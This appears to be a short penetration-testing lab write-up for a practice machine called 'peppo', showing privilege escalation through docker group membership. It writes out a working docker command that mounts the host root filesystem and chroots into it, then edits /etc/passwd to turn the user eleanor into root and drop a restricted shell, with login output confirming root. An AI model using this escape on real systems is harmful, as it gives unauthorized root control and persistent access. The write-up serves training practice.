InfoSec LAB

Peppo_Privilege_Escalation

Created: 3 min read

Docker Group

It has been identified that the current user, eleanor, is part of the docker group.

$ docker images 
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
redmine             latest              0c8429c66e07        4 years ago         542MB
postgres            latest              adf2b126dda8        4 years ago         313MB

These are 2 existing images to power the Redmine and PostgreSQL instances

$ docker run -it --rm -v /:/mnt adf2b126dda8 chroot /mnt bash

I will just grab one of the images and get a shell inside a docker container with access as root to the filesystem

root@04955d31f87c:/# nano /etc/passwd

Then I will turn the eleanor user into the root account. Also removing the rbash

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/peppo]
└─$ sshpass -p eleanor ssh eleanor@$IP 
Linux peppo 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Sat Mar 29 19:24:25 2025 from 192.168.45.218
root@peppo:~# /usr/bin/whoami
root
root@peppo:~# /bin/hostname
peppo
root@peppo:~# /sbin/ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:87:bb:a4:ca  txqueuelen 0  (Ethernet)
        RX packets 128581  bytes 55474609 (52.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 189070  bytes 20259928 (19.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.154.60  netmask 255.255.255.0  broadcast 192.168.154.255
        ether 00:50:56:9e:e8:b9  txqueuelen 1000  (Ethernet)
        RX packets 1247061  bytes 134053660 (127.8 MiB)
        RX errors 0  dropped 319  overruns 0  frame 0
        TX packets 433661  bytes 124752208 (118.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth069982c: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 5a:51:6a:02:fe:37  txqueuelen 0  (Ethernet)
        RX packets 113  bytes 7835 (7.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 147  bytes 12898 (12.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth6f82195: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether fe:0f:9a:09:8e:9b  txqueuelen 0  (Ethernet)
        RX packets 128468  bytes 57266908 (54.6 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 188929  bytes 20247394 (19.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
vethb59a7ff: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether c6:16:09:ac:af:8c  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System level compromise

Interactive Graph View

Backlinks